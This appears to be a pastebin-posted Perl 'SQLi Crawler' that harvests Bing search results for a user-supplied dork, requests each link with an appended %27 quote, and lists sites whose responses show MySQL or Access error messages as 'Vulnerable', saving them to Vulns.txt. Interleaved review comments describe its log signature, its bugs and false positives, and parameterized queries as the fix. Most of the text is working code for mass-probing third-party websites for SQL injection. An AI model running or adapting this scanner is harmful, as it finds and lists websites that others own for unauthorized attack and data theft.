
Untitled

a guest
Aug 31st, 2011
  1. #!/usr/bin/perl
  2.  
  3. use strict;
  4. use warnings;
  5. use HTTP::Request;
  6. use LWP::UserAgent;
  7.  
  # Interactive console script. It asks for a search query, collects result
  # links from Bing, requests each link once with "%27" appended, and searches
  # the response body for database error strings (all of that happens in
  # sql_scan, defined after the menu).
  # Every piece of working state is declared here as a file-scoped lexical,
  # so the menu code and the subroutine share these variables rather than
  # passing arguments or return values.
  8. ###############
  9. my $dork;
  10. my $url;
  11. my $i;
  12. my $request;
  13. my $useragent;
  14. my $response;
  15. my $start;
  16. my $end;
  17. my $result;
  18. my $fl;
  19. my $link;
  20. my $req;
  21. my $ua;
  22. my $result2;
  23. my $res;
  24. my $save;
  25. my $pages;
  26. my $page;
  27. my $choice;
  28. ##############
  # @z collects every link whose response matched an error signature. Nothing
  # in the script empties it, so entries from earlier scans in the same
  # session are still present when a later scan prints or saves the list.
  29. my @z;
  30.  
  # Banner only. q{} is a non-interpolating literal; nothing in it affects
  # what the script does.
  31. print q{
  32. _ ____ _
  33. | | _ \ | |
  34. __| | |_) | ___ | |_
  35. / _` | _ < / _ \| __|
  36. | (_| | |_) | (_) | |_
  37. \__,_|____/ \___/ \__|
  38.  
  39. ################################
  40. ## / SQLi Crawler / ##
  41. ## Private Edition ##
  42. ## ~Coded by dbx~ ##
  43. ################################
  44.  
  45. };
  46.  
  # Label targeted by the `goto MainMenu` at the end of sql_scan, which brings
  # control back here so the menu is shown again after a scan.
  47. MainMenu:
  48.  
  49. print "------------------------\n";
  50. print "Enter [1] To Begin SQLi.\n";
  51. print "Enter [2] To Exit.\n";
  52. print "------------------------\n\n";
  53. print "Your Choice: ";
  54.  
  # Read one line from STDIN; chomp removes the trailing newline.
  55. chomp ($choice = <STDIN>);
  56. print "\n";
  57.  
  # `eq` compares as strings, so only the exact input "1" starts a scan.
  # `&sql_scan` without parentheses calls the sub with the caller's current @_.
  58. if ($choice eq 1) {&sql_scan}
  # NOTE(review): the menu advertises [2] for exit, but this test checks for 5.
  # Any input other than 1 (including 2) matches neither test; execution then
  # runs past the sub definition to the end of the file and the script exits
  # without calling die.
  59. if ($choice eq 5) {die;}
  60.  
  # sql_scan: prompt for a Bing query and a page count, fetch the result
  # pages, and test every harvested link with a single error-based check.
  # Takes no arguments and returns no value; it reads and writes the
  # file-scoped variables declared at the top of the script and finishes by
  # jumping back to the MainMenu label.
  #
  # What the resulting traffic looks like to a defender (from the code below):
  #   - one GET per harvested link, with the literal suffix "%27" (a
  #     URL-encoded single quote) appended to the very end of the URL;
  #   - LWP::UserAgent is constructed with no options, so the requests carry
  #     LWP's default "libwww-perl/<version>" User-Agent;
  #   - no follow-up request: the verdict is taken from that one response body.
  # A request with that User-Agent and a trailing %27 is therefore a usable
  # hunting pattern in web or WAF logs. On the application side the durable
  # fix is parameterized queries; hiding database error output removes the
  # strings this script looks for but leaves the injection flaw in place.
  61. sub sql_scan
  62. {
  63.  
  64. print "[+] Enter Bing! dork: ";
  65. chomp ($dork = <STDIN>);
  66. print "\n";
  67. print "[+] How Many Pages To Leech?: ";
  68. chomp ($pages = <STDIN>);
  69. print "\n";
  70.  
  # String concatenation, not arithmetic: an input of 3 produces the loop
  # bound "31".
  71. $page = $pages.'1';
  72.  
  73. print "[~] Crawling...\n\n";
  74.  
  # $i is sent as the `first` parameter of the Bing URL and advances by 11 on
  # each iteration until it exceeds $page.
  75. for ($i = 0; $i <= $page; $i=$i+11)
  76. {
  77.  
  # The query text is interpolated into the URL exactly as typed.
  78. $url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";
  79.  
  # Fetch the result page. The body is used without checking whether the
  # request succeeded.
  80. $request = HTTP::Request->new(GET => $url);
  81. $useragent = LWP::UserAgent->new();
  82. $response = $useragent->request($request);
  83. $result = $response->content;
  84.  
  # Literal markup fragments expected on either side of each result URL.
  # Link extraction depends entirely on the page containing exactly this
  # markup.
  85. $start = '<h3><a href="';
  86. $end = '" onmousedown=';
  87.  
  # $start and $end are interpolated into the pattern unescaped; (.*?) captures
  # the shortest text between them, i.e. the href value. /g walks every match
  # on the page.
  88. while ($result =~ m/$start(.*?)$end/g)
  89.  
  90. {
  91. $fl = $1;
  # The probe URL is the harvested URL with %27 appended and nothing else
  # changed, so the quote lands in whatever component comes last in that URL.
  92. $link = $fl."%27";
  # A fresh, default-configured user agent is created for every link.
  93. $req = HTTP::Request->new(GET => $link);
  94. $ua = LWP::UserAgent->new();
  95. $res = $ua->request($req);
  96. $result2 = $res->content;
  97.  
  # MySQL / PHP error signatures, matched case-insensitively anywhere in the
  # body. `mysql_fetch_` already covers `mysql_fetch_array`, so that
  # alternative is redundant. This is a plain substring search over the whole
  # page: a page that merely quotes one of these messages (documentation, a
  # forum post) is reported as well, so the output is a list of candidates,
  # not confirmed findings.
  98. if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )
  99. {
  100. push @z, $link;
  101. print "[+] MySQL Vulnerable: $link\n\n";
  102. }
  103.  
  # NOTE(review): both signatures in this branch are Microsoft Access / JET
  # driver messages, yet the printed label says "MsSQL". A hit here points at
  # an Access backend, not at Microsoft SQL Server.
  104. elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )
  105. {
  106. push @z, $link;
  107. print "[+] MsSQL Vulnerable: $link\n\n";
  108. }
  109.  
  # Default verdict for every other response, including ones that failed to
  # load. It means "no signature seen", not "safe".
  110. else {
  111.  
  112. print "[-] $link <- Not Vulnerable\n\n";
  113. }
  114. }
  115.  
  116. }
  117. print "Vulnerable Links:\n";
  118. print "-----------------------------------\n";
  119. foreach (@z)
  120. {
  121. print "$_ \n\n";
  122. }
  123. print "Save Into A Text File? (Y or N): ";
  124. chomp ($save = <STDIN>);
  125.  
  # Only an uppercase "Y" saves; any other answer skips the block.
  126. if ($save eq 'Y')
  127. {
  128. print "Saving File...\n\n";
  # Two-argument open on a bareword handle with the mode embedded in the
  # string. The return value is not checked, and "File Saved!" is printed
  # whether or not the open succeeded. ">>" appends, so Vulns.txt in the
  # current working directory grows across runs; that file name is a useful
  # artifact when examining a host this script was run on.
  129. open(vuln_file, ">>Vulns.txt");
  130. foreach (@z)
  131. {
  132. print vuln_file "$_ \n";
  133. }
  134. close(vuln_file);
  135. print "File Saved!\n\n";
  136. }
  # Leaves the subroutine by jumping to the file-level MainMenu label instead
  # of returning to the caller.
  137. goto MainMenu;
  138. }